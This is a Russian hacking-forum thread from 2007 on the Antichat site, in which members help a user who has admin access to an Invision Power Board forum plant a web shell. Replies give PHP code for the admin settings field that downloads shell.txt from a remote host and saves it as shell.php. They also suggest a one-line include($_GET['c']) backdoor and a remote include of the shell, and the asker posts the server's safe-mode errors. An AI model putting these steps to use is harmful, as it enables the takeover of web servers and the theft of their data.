ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблемы с заливкой шелла в ipb
  #1  
Старый 17.03.2007, 22:26
Аватар для anakreon
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
Провел на форуме:
400363

Репутация: 11
По умолчанию Проблемы с заливкой шелла в ipb

Народ помогите!!!.
Есть доступ к админке IPB. версия 2.1.*
Не получается залить шелл через смайлы и phtml
при скуль запросах из-под админки выдает ошибку.
Могу слить базу.
Подскажите пожалуйста решение данной проблемы.
 
Ответить с цитированием

  #2  
Старый 17.03.2007, 22:40
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Цитата:
Не получается залить шелл через смайлы и phtml
Почему? В чём траблы?
 
Ответить с цитированием

  #3  
Старый 18.03.2007, 00:48
Аватар для anakreon
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
Провел на форуме:
400363

Репутация: 11
По умолчанию

загрузка в смайлы запрещены.
А через аттачи пишет ошибку. Мол обратитесь к админу для решения данной проблемы.
Настроил все правильно
так что остается только база. Вот и прошу совета как через базу залиться
 
Ответить с цитированием

  #4  
Старый 18.03.2007, 00:52
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

В очередной раз почему то забылась самая простая заливка шела через новую настройку,
Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
Код:
 $linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
  $string=fgets($from,4096);
  fputs($to,$string);
}
fclose($to);
fclose($from);
Узнаем полный путь к uploads:
"Настройки"->"Глобальные Настройки форума"->"Путь к папке /uploads/"
обычно этот путь указывается.

Author: VampiRUS
 
Ответить с цитированием

  #5  
Старый 18.03.2007, 01:12
Аватар для anakreon
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
Провел на форуме:
400363

Репутация: 11
По умолчанию

Гм... не проходит
Ругается
РЕДУПРЕЖДЕНИЕ IPB [2] fopen(): SAFE MODE Restriction in effect. The script whose uid is 1002 is not allowed to access /usr owned by uid 0 (Файл: /sources/admin/ad_settings.php(1145) : eval()'d code, строка: 4)
ПРЕДУПРЕЖДЕНИЕ IPB [2] fopen(/usr/home/vladimir/forum/uploads/remview.php): failed to open stream: No such file or directory (Файл: /sources/admin/ad_settings.php(1145) : eval()'d code, строка: 4)
 
Ответить с цитированием

  #6  
Старый 18.03.2007, 01:37
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

значит там safe mod =)
 
Ответить с цитированием

  #7  
Старый 18.03.2007, 01:43
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

а
<? include($_GET["c"]); ?>
неканает? или это для другого форума..))?
 
Ответить с цитированием

  #8  
Старый 18.03.2007, 12:59
Аватар для anakreon
anakreon
Познающий
Регистрация: 19.03.2006
Сообщений: 37
Провел на форуме:
400363

Репутация: 11
По умолчанию

помоему это для пхпбб
 
Ответить с цитированием

  #9  
Старый 18.03.2007, 15:20
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Zitt  
а
<? include($_GET["c"]); ?>
неканает? или это для другого форума..))?
Собстаенно должно проканать он ведь не стал ругаться на то что файл с удалённого хоста. Можно тупо вписать include("http://site.ru/shell.txt");, только потом геморно удалять его будет в некоторых случаях.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблеммы с заливкой шелла в ipb 1.3. $klip Форумы 3 13.11.2006 03:11
Ipb 2.0* Могу выполнять команды, проблемма с заливкой шелла samsam Форумы 13 31.10.2006 22:13
Проблемы с заливкой шелла на phpbb AlexCRC Форумы 8 21.10.2006 17:37
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ